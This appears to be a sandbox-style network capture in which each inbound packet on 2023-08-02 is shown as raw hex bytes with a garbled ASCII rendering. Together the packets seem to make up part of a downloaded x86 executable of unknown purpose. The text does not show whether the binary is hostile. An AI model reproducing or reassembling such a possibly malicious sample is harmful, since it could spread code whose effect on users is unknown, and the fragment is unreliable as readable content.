2023-08-02 08:35:16 UTC	2975	IN	Data Raw: 00 a1 8c c9 48 00 a3 cc 0c 49 00 c3 8b 15 8c c9 48 00 56 8d 71 14 8b ce e8 1e 00 00 00 84 c0 75 15 8b 15 90 c9 48 00 8b ce e8 0d 00 00 00 84 c0 75 04 33 c0 5e c3 6a 01 58 5e c3 8b 09 e8 46 35 fe ff f7 d8 1b c0 40 c3 b8 80 64 47 00 e8 4c 6d 04 00 83 ec 24 53 56 8b 71 3c 57 8b 7d 08 83 7f 18 00 75 0e ff 35 cc 0c 49 00 8d 4f 14 e8 2f ea fd ff 8b cf e8 93 ff ff ff 84 c0 0f 84 42 01 00 00 83 fe 09 72 07 b8 00 00 00 04 eb 27 83 fe 07 72 07 b8 00 00 00 02 eb 1b 83 fe 05 72 07 b8 00 00 00 01 eb 0f 83 fe 03 1b c0 25 00 00 f1 ff 05 00 00 10 00 83 fe 05 8b 0d a8 c9 48 00 1b db 43 83 fe 07 1b ff 83 e7 e0 83 c7 40 83 fe 05 73 06 8b 0d a4 c9 48 00 66 83 65 e2 00 89 4d f0 66 c7 45 e0 13 00 89 45 e8 8b 4d 08 83 65 fc 00 8d 45 e0 50 6a 01 5a e8 69 03 00 00 83 ce ff 8d 4d Data Ascii: HIHVquHu3^jX^F5@dGLm$SVq<W}u5IO/Br'rr%HC@sHfeMfEEMeEPjZiM
2023-08-02 08:35:16 UTC	2991	IN	Data Raw: 6b 47 00 e8 96 2d 04 00 51 56 8b f1 89 75 f0 8d 8e 94 00 00 00 c7 45 fc 03 00 00 00 e8 f1 fa fd ff 8d 4e 7c c6 45 fc 02 e8 e5 fa fd ff 8d 4e 68 c6 45 fc 01 e8 d9 fa fd ff 80 65 fc 00 8d 4e 54 e8 cd fa fd ff 83 4d fc ff 8d 4e 04 e8 f2 aa ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 8b c1 83 60 04 00 83 60 08 00 c7 00 ec a7 47 00 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 78 b1 47 00 c3 b8 9c 6b 47 00 e8 0a 2d 04 00 51 56 8b f1 89 75 f0 c7 06 00 b3 47 00 83 65 fc 00 e8 91 fa fd ff 83 4d fc ff 8b ce e8 5d fa fd ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 b2 6b 47 00 e8 d2 2c 04 00 51 56 8b f1 6a 28 e8 29 ee fd ff 59 8b c8 89 4d f0 33 c0 3b c8 89 45 fc 74 08 ff 75 08 e8 e2 02 00 00 83 4d fc ff 50 8b ce e8 81 d0 fe ff 8b 4d f4 5e 64 Data Ascii: kG-QVuEN\|ENhEeNTMNM^d``G3HHH@xGkG-QVuGeM]M^dkG,QVj()YM3;EtuMPM^d
2023-08-02 08:35:16 UTC	3007	IN	Data Raw: 65 fc 00 e8 1e af fd ff 8b 75 08 59 eb 2a 50 51 8d 4e 0c e8 c4 8b ff ff 85 c0 74 0f 8b f0 ff 75 e4 e8 00 af fd ff 59 8b c6 eb 22 ff 75 e4 80 65 fc 00 e8 ef ae fd ff 59 43 e9 46 ff ff ff 33 c0 eb 0b b8 3a cb 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 56 8b f2 57 8b f9 8d 46 0c 8d 56 08 50 e8 3e 00 00 00 85 c0 75 37 8b 07 66 83 38 3a 74 07 b8 57 00 07 80 eb 28 6a 01 6a 00 8b cf e8 25 aa fd ff 8d 46 04 8b d6 50 8b cf e8 13 00 00 00 85 c0 75 0c 8b 47 04 f7 d8 1b c0 25 57 00 07 80 5f 5e c3 56 57 8b 7c 24 0c 8b f1 83 27 00 e8 0a 98 ff ff 85 c0 74 2a 50 6a 00 8b ce e8 e7 a9 fd ff 8b 06 66 83 38 53 75 29 6a 01 6a 00 8b ce e8 d4 a9 fd ff 8b d7 8b ce e8 e0 97 ff ff 85 c0 75 07 b8 57 00 07 80 eb 0c 50 6a 00 8b ce e8 b6 a9 fd ff 33 c0 Data Ascii: euYPQNtuY"ueYCF3:BM_^d[VWFVP>u7f8:tW(jj%FPuG%W_^VW\|$'tPjf8Su)jjuWPj3
2023-08-02 08:35:16 UTC	3023	IN	Data Raw: 24 0c 8b f1 3b 7e 1c 7c 13 53 8d 5e 14 6a 00 8b cb e8 27 a1 00 00 3b 7e 1c 7d f2 5b 8b 4e 20 8a 44 24 10 84 c0 88 04 39 74 24 3b 7e 08 7c 0d 6a 00 6a 00 8b ce e8 73 2d ff ff eb ee 8b 46 0c 8b 4c 24 14 89 0c f8 8b 4c 24 18 89 4c f8 04 5f 5e c2 10 00 b8 48 78 47 00 e8 41 ad 03 00 83 ec 14 56 57 8b f9 8d b7 58 02 00 00 8b ce e8 ca 7a fd ff 81 c7 c8 01 00 00 8d 4d e0 57 e8 2f 3b ff ff 6a 0e 33 ff 5a 8d 4d e0 89 7d fc e8 3f 01 00 00 6a 0f 8d 4d e0 5a e8 34 01 00 00 6a 11 8b d6 8d 4d e0 e8 d7 00 00 00 6a 10 8b d6 8d 4d e0 e8 cb 00 00 00 6a 09 8b d6 8d 4d e0 e8 bf 00 00 00 6a 06 8b d6 8d 4d e0 e8 b3 00 00 00 6a 12 8b d6 8d 4d e0 e8 a7 00 00 00 6a 14 8b d6 8d 4d e0 e8 9b 00 00 00 6a 13 8b d6 8d 4d e0 e8 8f 00 00 00 6a 15 8b d6 8d 4d e0 e8 83 00 00 00 6a 0a 8b d6 Data Ascii: $;~\|S^j';~}[N D$9t$;~\|jjs-FL$L$L_^HxGAVWXzMW/;j3ZM}?jMZ4jMjMjMjMjMjMjMjMj
2023-08-02 08:35:16 UTC	3039	IN	Data Raw: 3b c3 0f 85 3f 01 00 00 39 5e 18 74 65 8b ce e8 8f fc ff ff ff 46 28 8b f8 3b fb c6 46 39 01 75 1c 8b 4e 34 3b cb 74 15 8b 56 10 3b d3 74 0e 8b 46 48 2b 46 20 50 e8 df af fd ff 8b f8 39 5e 10 75 16 80 7e 1c 00 74 10 39 5e 34 74 0b 6a 01 8b ce e8 0f fc ff ff eb 07 8b ce e8 32 fc ff ff 3b c3 0f 85 e0 00 00 00 3b fb 74 9d 8b c7 e9 d5 00 00 00 80 66 1c 00 83 7d ec 00 0f 87 b3 00 00 00 8b 5d 10 e9 d1 fe ff ff 8b 46 0c 8b 4e 28 8b 40 08 3b c8 7d 3a 8b 46 08 8b 56 24 03 d1 33 ff 8b 48 20 8b 40 0c 8d 0c d1 8b 11 8b 49 04 8b 04 90 8b 56 48 8b 40 70 8b 04 88 8b 48 10 89 4e 3c 8b 4e 4c 8b 40 0c 3b f9 77 17 72 04 3b c2 73 07 b8 05 40 00 80 eb 71 3b f9 72 2c 77 04 3b c2 76 26 8b c8 2b 4e 48 3b 4d 0c 72 03 8b 4d 0c 01 4d ec 85 db 74 05 8b 55 ec 89 13 01 4d 08 29 4d 0c Data Ascii: ;?9^teF(;F9uN4;tV;tFH+F P9^u~t9^4tj2;;tf}]FN(@;}:FV$3H @IVH@pHN<NL@;wr;s@q;r,w;v&+NH;MrMMtUM)M
2023-08-02 08:35:16 UTC	3055	IN	Data Raw: e8 7a 03 00 00 8d 46 18 8d 8d 18 fe ff ff 50 6a 08 5b 8b d3 e8 1e 03 00 00 84 c0 0f 84 c9 01 00 00 8d 7e 1c 8b d3 57 8d 8d 20 fe ff ff e8 05 03 00 00 84 c0 75 03 83 27 00 8d 7e 20 8b d3 57 8d 8d 28 fe ff ff e8 ed 02 00 00 84 c0 75 03 83 27 00 0f b6 85 30 fe ff ff 0f b6 8d 31 fe ff ff c1 e0 08 0b c1 0f b6 8d 32 fe ff ff c1 e0 08 0b c1 0f b6 8d 33 fe ff ff c1 e0 08 0b c1 3d 00 00 00 80 8d 46 10 89 45 0c 75 6a 0f b6 85 34 fe ff ff 0f b6 8d 35 fe ff ff c1 e0 08 0b c1 0f b6 8d 36 fe ff ff c1 e0 08 0b c1 0f b6 8d 37 fe ff ff 0f b6 bd 39 fe ff ff c1 e0 08 0b c1 33 c9 8b d0 0f b6 85 38 fe ff ff c1 e0 08 0b c7 0f b6 bd 3a fe ff ff c1 e0 08 0b c7 0f b6 bd 3b fe ff ff c1 e0 08 0b c7 33 ff 0b c8 8b 45 0c 0b d7 89 08 89 50 04 eb 17 50 6a 0c 5a 8d 8d 30 fe ff ff e8 df Data Ascii: zFPj[~W u'~ W(u'0123=FEuj4567938:;3EPPjZ0
2023-08-02 08:35:16 UTC	3071	IN	Data Raw: 65 fc 00 8d 4d 80 e8 56 00 00 00 33 c0 eb 0b b8 07 cb 43 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 14 00 8b c1 33 c9 89 08 89 48 04 89 48 08 89 48 0c 89 48 10 89 48 14 89 48 18 89 48 1c 89 48 20 89 48 28 89 48 2c 89 48 30 c7 40 34 04 00 00 00 c7 40 24 30 b8 47 00 c3 b8 a7 87 47 00 e8 33 ed 02 00 51 51 56 8b f1 57 89 75 f0 83 65 fc 00 8d 7e 24 89 7d ec c7 07 30 b8 47 00 8b cf c6 45 fc 05 e8 ac ba fc ff 8b cf c6 45 fc 04 e8 78 ba fc ff 8b 46 20 c6 45 fc 03 85 c0 74 06 8b 08 50 ff 51 08 8b 46 1c c6 45 fc 02 85 c0 74 06 8b 08 50 ff 51 08 8b 46 14 c6 45 fc 01 85 c0 74 06 8b 08 50 ff 51 08 8b 46 10 80 65 fc 00 85 c0 74 06 8b 08 50 ff 51 08 8b 76 0c 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9 c3 e9 53 Data Ascii: eMV3CM_^d[3HHHHHHHH H(H,H0@4@$0GG3QQVWue~$}0GEExF EtPQFEtPQFEtPQFetPQvMtVPM_^dS
2023-08-02 08:35:16 UTC	3087	IN	Data Raw: e8 fe fc ff ff 8a 46 40 8b cf 50 e8 c1 fc ff ff 8a 46 41 8b cf 50 e8 b6 fc ff ff 8a 06 80 7d fd 00 88 45 f8 74 08 3c 2d 73 04 c6 45 f8 2d ff 75 f8 8b cf e8 99 fc ff ff 8a 46 01 8b cf 50 e8 8e fc ff ff 66 8b 46 02 8b cf 50 e8 91 fc ff ff 66 8b 46 04 8b cf 50 e8 85 fc ff ff ff 76 08 8b cf e8 9e fc ff ff ff 76 0c 8b cf e8 94 fc ff ff 80 7d ff 00 74 05 83 c8 ff eb 03 8b 46 10 50 8b cf e8 7e fc ff ff 80 7d 0b 00 74 05 83 c8 ff eb 03 8b 46 18 53 50 8b cf e8 67 fc ff ff ff 76 24 8b cf e8 3a fc ff ff 8a 5d fe 8a 45 ff f6 db 1b db 83 e3 08 f6 d8 1b c0 83 e0 08 03 d8 8a 45 0b f6 d8 1b c0 83 e0 08 03 d8 8a 45 fd f6 d8 8d 4b 04 1b c0 23 c1 8a 8e 8a 00 00 00 f6 d9 1b c9 83 e1 24 03 c1 8d 4e 68 89 45 f8 e8 83 fe ff ff 01 45 f8 8b cf ff 75 f8 e8 e5 fb ff ff ff b6 80 00 Data Ascii: F@PFAP}Et<-sE-uFPfFPfFPvv}tFP~}tFSPgv$:]EEEK#$NhEEu
2023-08-02 08:35:16 UTC	3103	IN	Data Raw: 4e 24 c7 44 24 78 ff ff ff ff e8 6b 32 ff ff 8d 4e 4c e8 63 32 ff ff 8d 4e 74 e8 5b 32 ff ff 8b 86 b4 00 00 00 85 c0 74 10 8b 10 50 ff 52 08 c7 86 b4 00 00 00 00 00 00 00 8b c7 e9 c9 00 00 00 8b 44 24 14 c6 44 24 78 00 85 c0 74 06 8b 08 50 ff 51 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8d 4e 24 e8 13 32 ff ff 8d 4e 4c e8 0b 32 ff ff 8b 46 74 33 db 3b c3 74 09 8b 10 50 ff 52 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 0c 8b 08 50 ff 51 08 89 9e b4 00 00 00 8b c7 eb 6e 8b 44 24 14 c6 44 24 78 00 3b c3 74 06 8b 10 50 ff 52 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8b 46 24 3b c3 74 09 8b 08 50 ff 51 08 89 5e 24 8b 46 4c 3b c3 74 09 8b 10 50 ff 52 08 89 5e 4c 8b 46 74 3b c3 74 09 8b 08 50 ff 51 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 a3 8b 10 50 ff 52 08 89 9e b4 00 00 Data Ascii: N$D$xk2NLc2Nt[2tPRD$D$xtPQt$D$xN$2NL2Ft3;tPR^t;tPQnD$D$x;tPRt$D$xF$;tPQ^$FL;tPR^LFt;tPQ^t;tPR
2023-08-02 08:35:16 UTC	3119	IN	Data Raw: 9c 70 02 00 00 8b 2a 83 c2 04 03 cd 46 3b c8 72 f4 8d 6e ff 3b eb 7e 20 3b 7c 24 18 74 1a 83 ff 01 74 15 8b 54 24 10 83 e2 01 80 fa 01 75 09 8b f5 2b 8c b4 70 02 00 00 8b 6c 24 24 33 c0 3b c3 7c 08 3b c6 7d 04 33 d2 eb 05 ba 01 00 00 00 88 14 28 8b 54 24 38 40 3b c2 7c e3 8b 44 24 1c 8b de 8b 74 24 10 2b c1 4f 46 81 ed 02 01 00 00 89 44 24 1c 85 ff 89 74 24 10 89 6c 24 24 0f 85 6f ff ff ff 8b 6c 24 54 c7 44 24 28 04 00 00 00 8b 5c 24 18 33 d2 8d b5 20 06 00 00 33 c0 8b fe 42 b9 02 01 00 00 81 c6 08 04 00 00 3b d3 f3 ab 7c ea 33 c9 8d 85 80 36 00 00 89 4c 24 34 89 44 24 1c 8b 54 24 3c 33 ff 8d 74 24 70 33 c0 8a 04 11 41 3d ff 00 00 00 72 08 33 db 8a 1c 11 03 c3 41 89 06 47 83 c6 04 83 ff 32 7d 06 3b 4c 24 20 72 da 89 4c 24 30 c7 44 24 24 ff ff ff ff c7 44 Data Ascii: p*F;rn;~ ;\|$ttT$u+pl$$3;\|;}3(T$8@;\|D$t$+OFD$t$l$$ol$TD$(\$3 3B;\|36L$4D$T$<3t$p3A=r3AG2};L$ rL$0D$$D
2023-08-02 08:35:16 UTC	3135	IN	Data Raw: 8b c2 89 56 04 3b c1 75 07 8b ce e8 bb 24 fc ff 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 e9 78 02 00 00 25 ff ff 00 00 33 d2 33 c9 89 44 24 14 8a 90 f0 13 49 00 8d b5 70 04 00 00 89 54 24 1c 8a 8c 2a 3d 08 00 00 8b 9c 95 80 11 00 00 8b f9 85 ff 76 7d 8b 46 28 3b f8 72 4b b9 08 00 00 00 2b f8 2b c8 8a c3 8b 2e d2 e0 8a 4e 2c 0a c1 8b 4e 04 88 04 29 8b 6e 04 8b 4e 08 45 8b c5 89 6e 04 3b c1 75 0b 8b ce e8 39 24 fc ff 8b 54 24 1c 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 eb 23 8b 6e 28 b0 01 8b cf d2 e0 b9 08 00 00 00 2b cd fe c8 22 c3 d2 e0 8a 4e 2c 0a c8 2b ef 88 4e 2c 89 6e 28 8b 44 24 14 8b 6c 24 10 8b 8d e0 04 00 00 33 db 8a 1c 11 8b 8d dc 04 00 00 8b fb 33 db 8a 1c 11 2b c3 85 ff 8b d8 76 71 8b 46 28 3b f8 72 47 b9 Data Ascii: V;u$N(F(F,wx%33D$IpT$*=v}F(;rK++.N,N)nNEn;u9$T$N(F(F,w#n(+"N,+N,n(D$l$33+vqF(;rG
2023-08-02 08:35:16 UTC	3151	IN	Data Raw: 00 00 00 00 5e c3 90 90 90 90 90 90 90 90 56 8b 74 24 08 8d 4e 30 e8 94 e4 fb ff 85 c0 75 0b 8b 8e ac 1c 00 00 e8 c4 fc ff ff 5e c2 04 00 51 8b 41 2c 56 8d 71 08 8b 54 24 0c b9 0f 00 00 00 57 8b 7e 20 2b c8 d3 ef b9 11 00 00 00 03 c2 2b ca 89 46 24 81 e7 ff ff 01 00 d3 ef 83 f8 10 72 72 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 0e d5 fb ff 88 44 24 08 eb 09 8a 08 40 88 4c 24 08 89 06 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 ef d4 fb ff 88 44 24 10 eb 09 8a 10 40 88 54 24 10 89 06 8b 46 20 8b 4c 24 10 8b 54 24 08 81 e1 ff 00 00 00 c1 e0 08 0b c1 8b 4e 24 c1 e0 08 81 e2 ff 00 00 00 83 c1 f0 0b c2 89 4e 24 89 46 20 8b c1 83 f8 10 73 8e 8b c7 5f 5e 59 c2 04 00 90 90 90 90 81 ec b4 00 00 00 53 55 56 33 db 57 8b e9 33 f6 6a 04 8b cd e8 37 ff ff ff 88 44 34 28 46 83 fe 14 Data Ascii: ^Vt$N0u^QA,VqT$W~ ++F$rrN;rD$@L$N;rD$@T$F L$T$N$N$F s_^YSUV3W3j7D4(F
2023-08-02 08:35:16 UTC	3167	IN	Data Raw: 90 b1 47 00 c7 41 04 80 b1 47 00 e9 ae ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a ff 68 9e 9b 47 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 94 00 00 00 53 55 8b e9 56 57 8d 4c 24 1c e8 48 94 fb ff 33 ff 89 bc 24 ac 00 00 00 89 7c 24 40 89 7c 24 44 89 7c 24 54 89 7c 24 60 68 00 00 10 00 8d 4c 24 20 c6 84 24 b0 00 00 00 01 e8 2c 94 fb ff 84 c0 75 62 8d 4c 24 40 c6 84 24 ac 00 00 00 02 e8 34 a3 fb ff 8b 44 24 54 c6 84 24 ac 00 00 00 00 3b c7 74 06 8b 08 50 ff 51 08 8d 4c 24 1c c7 84 24 ac 00 00 00 03 00 00 00 e8 2b 94 fb ff 8b 44 24 28 c7 84 24 ac 00 00 00 ff ff ff ff 3b c7 0f 84 90 00 00 00 8b 10 50 ff 52 08 b8 0e 00 07 80 e9 26 06 00 00 8b 84 24 b4 00 00 00 8d 4c 24 1c 50 e8 04 94 fb ff 8d 4c 24 1c e8 0a 94 fb ff 68 00 00 10 00 8d 4c 24 Data Ascii: GAGjhGdPd%SUVWL$H3$\|$@\|$D\|$T\|$`hL$ $,ubL$@$4D$T$;tPQL$$+D$($;PR&$L$PL$hL$
2023-08-02 08:35:16 UTC	3183	IN	Data Raw: ff ff 5f 5e 5b 83 f9 03 76 11 8b 54 24 18 33 c0 89 02 8b c5 5d 83 c4 0c c2 0c 00 8b 54 24 18 49 d3 e0 83 e0 07 89 02 8b c5 5d 83 c4 0c c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 2c 83 fa 10 73 08 33 c0 83 c4 2c c2 08 00 8b 44 24 30 53 55 83 ea 10 56 2b c1 57 89 54 24 28 c7 44 24 10 00 00 00 00 8b f9 89 44 24 24 90 0f b6 07 83 e0 1f 0f b6 88 bc c5 47 00 b8 05 00 00 00 33 f6 89 4c 24 20 89 44 24 1c 89 74 24 18 8b 54 24 20 8b ce d3 ea f6 c2 01 0f 84 84 01 00 00 8b f0 8b c8 c1 ee 03 0f b6 44 37 05 99 0f a4 c2 08 c1 e0 08 8b d8 0f b6 44 37 04 8b ea 99 83 e1 07 03 d8 0f b6 44 37 03 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 02 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 44 37 01 13 ea 0f a4 dd 08 99 c1 e3 08 03 d8 0f b6 04 37 13 ea 0f a4 dd 08 Data Ascii: _^[vT$3]T$I],s3,D$0SUV+WT$(D$D$$G3L$ D$t$T$ D7D7D7D7D77
2023-08-02 08:35:16 UTC	3199	IN	Data Raw: 75 08 8b d1 c7 02 02 00 00 00 83 7e 78 08 0f 85 da fd ff ff e9 5f fd ff ff bd 01 00 00 00 e9 61 fd ff ff 8b 44 24 48 c7 00 02 00 00 00 e9 50 fd ff ff 8b 4c 24 48 c7 01 03 00 00 00 e9 41 fd ff ff 8b 54 24 48 c7 02 03 00 00 00 e9 32 fd ff ff 8b e8 e9 2d fd ff ff 5f 5e 8b c5 5d 5b 83 c4 24 c2 14 00 5f 5e 5d 33 c0 5b 83 c4 24 c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 8b 4c 24 10 8b 01 53 33 db 39 5f 18 55 8b 6c 24 14 0f 95 c3 89 44 24 0c c7 44 24 14 00 00 20 00 c7 01 00 00 00 00 83 c3 05 3b c3 73 0d 5d b8 07 00 00 00 5b 83 c4 08 c2 0c 00 8b 0f 2b c3 89 44 24 08 e8 a6 25 00 00 8b 57 14 8d 44 24 14 50 68 00 00 01 00 8d 4c 24 10 51 8b 0f 03 dd 53 e8 6a 62 00 00 8b 54 24 14 85 d2 0f 84 9f 01 00 00 56 85 c0 75 2c 8b 74 24 0c 8d 46 02 3b c2 73 Data Ascii: u~x_aD$HPL$HAT$H2-_^][$_^]3[$L$S39_Ul$D$D$ ;s][+D$%WD$PhL$QSjbT$Vu,t$F;s
2023-08-02 08:35:16 UTC	3215	IN	Data Raw: 0f b6 8c 24 80 00 00 00 57 8d bd a0 0e 03 00 e8 da f0 ff ff eb 50 0f b6 84 24 80 00 00 00 c7 44 24 34 00 00 00 00 0d 00 01 00 00 8d 49 00 8b c8 c1 e9 08 0f b7 14 4f 8b c8 c1 e9 07 83 e1 01 f7 d9 c1 f9 04 83 e1 7f c1 ea 04 33 d1 8b 4c 24 34 03 8c 95 a0 0e 03 00 03 c0 89 4c 24 34 3d 00 00 01 00 72 ca 8b c1 8b 54 24 2c 03 d0 89 54 24 2c 3b 93 d0 06 00 00 73 2c 89 93 d0 06 00 00 8b 54 24 14 89 93 e8 06 00 00 c7 83 ec 06 00 00 ff ff ff ff c7 83 d8 06 00 00 00 00 00 00 c7 44 24 28 01 00 00 00 8b 4c 24 40 0f b7 84 4d b0 25 03 00 0f b7 94 75 30 27 03 00 35 f0 07 00 00 c1 e8 04 8b 84 85 a0 0e 03 00 03 44 24 24 81 f2 f0 07 00 00 c1 ea 04 8b bc 95 a0 0e 03 00 8b 54 24 14 03 f8 89 44 24 58 8a 84 24 80 00 00 00 89 7c 24 48 38 44 24 13 75 61 39 93 e8 06 00 00 73 09 83 Data Ascii: $WP$D$4IO3L$4L$4=rT$,T$,;s,T$D$(L$@M%u0'5D$$T$D$X$\|$H8D$ua9s
2023-08-02 08:35:16 UTC	3231	IN	Data Raw: 24 14 8a 48 02 80 f9 07 73 14 fe 48 03 75 0f 66 d1 20 b2 03 d2 e2 fe c1 88 48 02 88 50 03 89 7e 08 8a 1f 8b ce e8 14 fb ff ff 5f 5e 5d 0f b6 c3 5b 81 c4 0c 05 00 00 c3 5f 5e 5d b8 fe ff ff ff 5b 81 c4 0c 05 00 00 c3 cc cc cc cc cc cc 33 c0 89 01 89 41 04 c7 41 08 ff ff ff ff 88 41 0c c7 41 10 01 00 00 00 89 41 14 c3 cc cc cc cc 8b 46 08 33 d2 f7 74 24 0c 53 bb 00 00 00 00 8b c8 0f af 4c 24 08 01 0e 11 5e 04 0f af 44 24 0c 89 46 08 3d 00 00 00 01 73 78 55 57 83 cd ff 90 8b 3e c1 66 08 08 81 ff 00 00 00 ff 72 10 8b 56 04 8b c7 b1 20 e8 36 67 00 00 85 c0 74 3a 8a 5e 0c 8b 06 8b 56 04 8b 7e 18 b1 20 e8 20 67 00 00 8b ca 8d 14 03 8b 07 8b cf ff d0 80 cb ff 01 6e 10 8b 46 10 11 6e 14 0b 46 14 75 d5 8b 3e 8b cf c1 e9 18 88 4e 0c 33 db 83 46 10 01 89 5e 04 11 5e Data Ascii: $HsHuf HP~_^][_^][3AAAAAF3t$SL$^D$F=sxUW>frV 6gt:^V~ gnFnFu>N3F^^
2023-08-02 08:35:16 UTC	3247	IN	Data Raw: 89 51 58 89 41 5c 89 41 60 89 81 a8 00 00 00 89 81 bc 00 00 00 89 81 d0 00 00 00 89 81 e4 00 00 00 89 01 89 41 04 89 41 48 89 41 4c c3 cc 83 c1 58 e9 98 f9 ff ff cc cc cc cc cc cc cc cc 83 ec 58 8b 44 24 5c 53 8b 5c 24 68 55 8b 6c 24 68 56 57 89 54 24 10 8b 13 8b f9 8b 08 c7 00 00 00 00 00 8b 44 24 7c c7 03 00 00 00 00 89 4c 24 1c 89 54 24 18 c7 00 00 00 00 00 eb 03 8d 49 00 8b 0b 8b 74 24 18 8b 07 2b f1 89 74 24 74 83 f8 06 0f 85 17 01 00 00 8b 44 24 1c 8b 4c 24 6c 2b 01 89 74 24 70 89 44 24 74 85 f6 75 08 85 c0 0f 84 91 05 00 00 8b 54 24 7c 8b 44 24 78 52 50 6a 00 8d 4c 24 7c 51 55 8d 94 24 88 00 00 00 52 8b 54 24 28 8d 4f 58 e8 d5 f9 ff ff 8b 74 24 74 8b 54 24 10 56 8d 8f 90 01 00 00 89 44 24 18 e8 ad f1 ff ff 8b 44 24 70 01 03 8b 4c 24 6c 03 e8 01 47 Data Ascii: QXA\A`AAHALXXD$\S\$hUl$hVWT$D$\|L$T$It$+t$tD$L$l+t$pD$tuT$\|D$xRPjL$\|QU$RT$(OXt$tT$VD$D$pL$lG
2023-08-02 08:35:16 UTC	3263	IN	Data Raw: 0f 83 e6 f0 eb 03 6a 10 5e 89 75 0c 89 7d dc 83 fe e0 0f 87 f3 00 00 00 6a 09 e8 59 1a 00 00 59 c7 45 fc 01 00 00 00 8d 45 d4 50 8d 45 c8 50 53 e8 3f 2d 00 00 83 c4 0c 8b f8 89 7d d0 85 ff 0f 84 aa 00 00 00 3b 35 5c 01 49 00 73 5c 8b de c1 eb 04 53 57 ff 75 d4 ff 75 c8 e8 dd 30 00 00 83 c4 10 85 c0 74 08 8b 45 08 89 45 dc eb 38 53 e8 9c 2d 00 00 59 89 45 dc 85 c0 74 2a 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 ff 75 08 ff 75 dc e8 37 fa ff ff 57 ff 75 d4 ff 75 c8 e8 28 2d 00 00 83 c4 18 8b 5d 08 83 7d dc 00 75 53 56 6a 00 ff 35 80 65 49 00 ff 15 8c a1 47 00 89 45 dc 85 c0 74 3d 0f b6 07 c1 e0 04 89 45 cc 3b c6 72 02 8b c6 50 53 ff 75 dc e8 f0 f9 ff ff 57 ff 75 d4 ff 75 c8 e8 e1 2c 00 00 83 c4 18 eb 13 56 53 6a 00 ff 35 80 65 49 00 ff 15 94 a1 47 00 Data Ascii: j^u}jYYEEPEPS?-};5\Is\SWuu0tEE8S-YEt*E;rPuu7Wuu(-]}uSVj5eIGEt=E;rPSuWuu,VSj5eIG
2023-08-02 08:35:16 UTC	3279	IN	Data Raw: d5 8b f0 3b f3 74 0c c7 05 40 38 49 00 01 00 00 00 eb 28 ff 15 f0 a1 47 00 8b f8 3b fb 0f 84 ea 00 00 00 c7 05 40 38 49 00 02 00 00 00 e9 8f 00 00 00 83 f8 01 0f 85 81 00 00 00 3b f3 75 0c ff d5 8b f0 3b f3 0f 84 c2 00 00 00 66 39 1e 8b c6 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 2b c6 8b 3d 44 a0 47 00 d1 f8 53 53 40 53 53 50 56 53 53 89 44 24 34 ff d7 8b e8 3b eb 74 32 55 e8 4e b4 ff ff 3b c3 59 89 44 24 10 74 23 53 53 55 50 ff 74 24 24 56 53 53 ff d7 85 c0 75 0e ff 74 24 10 e8 65 b5 ff ff 59 89 5c 24 10 8b 5c 24 10 56 ff 15 ec a1 47 00 8b c3 eb 53 83 f8 02 75 4c 3b fb 75 0c ff 15 f0 a1 47 00 8b f8 3b fb 74 3c 38 1f 8b c7 74 0a 40 38 18 75 fb 40 38 18 75 f6 2b c7 40 8b e8 55 e8 e7 b3 ff ff 8b f0 59 3b f3 75 04 33 f6 eb 0b 55 57 56 e8 cf b9 ff ff Data Ascii: ;t@8I(G;@8I;u;f9t@@f9u@@f9u+=DGSS@SSPVSSD$4;t2UN;YD$t#SSUPt$$VSSut$eY\$\$VGSuL;uG;t<8t@8u@8u+@UY;u3UWV
2023-08-02 08:35:16 UTC	3295	IN	Data Raw: f8 ff 8d 4d cc e9 91 cd f8 ff 8d 4d d8 e9 89 cd f8 ff 8d 4d c0 e9 81 cd f8 ff 8d 4d d8 e9 79 cd f8 ff 8d 4d c0 e9 71 cd f8 ff 8d 4d 94 e9 e7 39 fb ff 8d 4d 94 e9 df 39 fb ff 8d 4d bc e9 32 d9 f8 ff 8d 4d 94 e9 cf 39 fb ff b8 28 01 48 00 e9 02 6a ff ff cc cc 8d 4d e8 e9 3d cd f8 ff 8d 4d d0 e9 35 cd f8 ff 8d 4d dc e9 2d cd f8 ff b8 a8 01 48 00 e9 de 69 ff ff cc cc 8d 4d e0 e9 19 cd f8 ff b8 e0 01 48 00 e9 ca 69 ff ff cc cc 8d 4d e8 e9 05 cd f8 ff b8 08 02 48 00 e9 b6 69 ff ff cc cc 8d 4d e8 e9 f1 cc f8 ff b8 30 02 48 00 e9 a2 69 ff ff cc cc 8d 4d e0 e9 dd cc f8 ff b8 58 02 48 00 e9 8e 69 ff ff cc cc 8d 4d e0 e9 c9 cc f8 ff b8 80 02 48 00 e9 7a 69 ff ff cc cc 8d 4d e4 e9 b5 cc f8 ff 8d 4d cc e9 ad cc f8 ff 8d 4d d8 e9 a5 cc f8 ff b8 a8 02 48 00 e9 56 69 ff Data Ascii: MMMMyMqM9M9M2M9(HjM=M5M-HiMHiMHiM0HiMXHiMHziMMMHVi
